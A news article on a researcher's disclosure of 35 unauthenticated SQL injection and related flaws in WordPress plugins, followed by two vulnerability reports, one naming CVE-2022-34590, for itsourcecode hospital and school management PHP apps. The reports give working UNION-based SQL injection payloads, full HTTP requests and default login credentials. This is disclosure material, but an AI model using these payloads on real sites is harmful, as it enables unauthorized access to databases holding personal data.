Unauthenticated SQL injection bugs put thousands of WordPress sites under threat

A researcher at security firm Cyllective has unearthed vulnerabilities in dozens of WordPress plugins, affecting tens of thousands of installations.

Dave Miller, who leads Cyllective’s penetration testing team, says they started out testing randomly selected plugins, quickly finding an unauthenticated SQL injection vulnerability.

They also found a series of local file inclusion and remote code execution (RCE) vulnerabilities. However, as these issues were found in severely outdated plugins, the team decided to concentrate its efforts on those that have received updates in the last two years – around 5,000 plugins in total.

**Exposed endpoints**

Looking particularly for unauthenticated SQL injection vulnerabilities, the researcher used a system of tags to identify plugins showing interaction with the WordPress database; string interpolation in SQL-like strings; security measures relating to sanitization attempts; and exposure of unauthenticated endpoints.

And after three months’ research, says Miller, the result was a total of 35 vulnerabilities, all of which could have been exploited by unauthenticated attackers, affecting around 60,500 instances running the affected WordPress plugins.

**RELATED** Unpatched plugins threaten millions of WordPress websites

“Although the vast majority of the vulnerabilities I reported were unauthenticated SQL injection vulnerabilities, which would have enabled an attacker to dump the entire WordPress database contents, these were not the most devastating ones,” Miller tells _The Daily Swig_.

“The sitemap-by-click5 plugin suffered from an unauthenticated arbitrary options update flaw, which would have allowed an attacker to maliciously enable the registration functionality and set the default user role to that of an administrator.”

This, he says, would essentially allow an unauthenticated attacker to create a new administrator account and take over the WordPress instance. And, from there, the attacker would be able to upload malicious PHP files, which would grant the attacker remote code execution capabilities on the underlying server as a low-privileged user.

**Looking for patterns**

With a bit more engineering, says Miller, the team's tag strategy could be used to fine flaws other than SQL injection vulnerabilities.

“New patterns would need to be developed which capture the specifics of the vulnerability class to be able to detect them,” he says. “Some vulnerability classes are, however, hard or even impossible to detect with this approach.”

Read more of the latest WordPress security news

Miller says that, despite the large number of vulnerabilities discovered, the disclosure process went smoothly, with the team reporting each vulnerability as it was discovered – on occasion, as many as four or five per day.

“WPScan \[a WordPress security vendor\] coordinated the process of communication between all the parties involved - researcher, plugin author and the WordPress plugin team – in a timely manner,” he says.

And, he adds, the team is still working through more plugins, with more vulnerabilities being discovered and responsibly disclosed.

“Security is ultimately the responsibility of the plugin developer, and the Plugin team encourages this to the best of its ability,” a WordPress spokesperson tells _The Daily Swi_g.

“To this end, guidelines exist for plugin authors to consult before submitting plugins to the directory. All developers are expected to abide by these guidelines. In addition, they have at their disposal a Plugin Handbook that covers security best practices.”

**DON’T MISS** W3C launches Decentralized Identifiers as a web standard

WordPress plugin security audit unearths dozens of vulnerabilities impacting 60,000 websites

Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter in /HMS/admin.php.

Permalink

**Hospital Management System v1.0 by itsourcecode.com has SQL injection**

**Login account:**

​ username：admin

​ password：123456789

**vendors:** https://itsourcecode.com/free-projects/php-project/hospital-management-system-in-php-with-source-code/

**Vulnerability url:** /HMS/admin.php?editid=

**Vulnerability location:** /HMS/admin.php

When the Edit button is clicked, a request is sent to query admin information based on editid

**\[+\] Payload:** /HMS/admin.php?editid=1'%20union%20select%201%2cdatabase()%2c3%2c4%2c5%2c6%20limit%201%2c1%23

​ Leak place : editid

**Current database name:** hms

**Request package**：select admin information by editid

    GET /HMS/admin.php?editid=1'%20union%20select%201%2cdatabase()%2c3%2c4%2c5%2c6%20limit%201%2c1%23 HTTP/1.1
    Host: 10.12.171.4
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://10.12.171.4/HMS/viewadmin.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    Cookie: PHPSESSID=t9h6rke4unvvsje2tvam91601p; _ga=GA1.1.1903248581.1656124410; _gid=GA1.1.2042416137.1656124410; _gat=1
    Connection: close
    

**SQL injection result**：database name is displayed.

CVE-2022-34590: bug_report/sql_injection.md at master · Renrao/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via the grade parameter at /school/view/student_grade_wise.php.

Permalink

Cannot retrieve contributors at this time

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

**Login account:**

​ username：suarez081119@gmail.com

​ password：12345

**vendors:** https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

**Vulnerability url:** /school/view/student\_grade\_wise.php?grade=

**Vulnerability location:** /school/view/student\_grade\_wise.php

**\[+\] Payload:** /school/view/student\_grade\_wise.php?grade=11'%20union%20select%20database()%2c2%2c3%3b%23

​ Leak place : grade

**Current database name:** std\_db, length is 6

**Request package**：select all students whose grade is specified

    GET /school/view/student_grade_wise.php?grade=11'%20union%20select%20database()%2c2%2c3%3b%23 HTTP/1.1
    Host: 10.12.171.4
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
    Accept: */*
    Referer: http://10.12.171.4/school/view/all_student.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    Cookie: PHPSESSID=cp26rmntdlbhle8qiofns95sv7
    Connection: close
    

**SQL injection result**：line 6 database name is displayed.

Tag

#php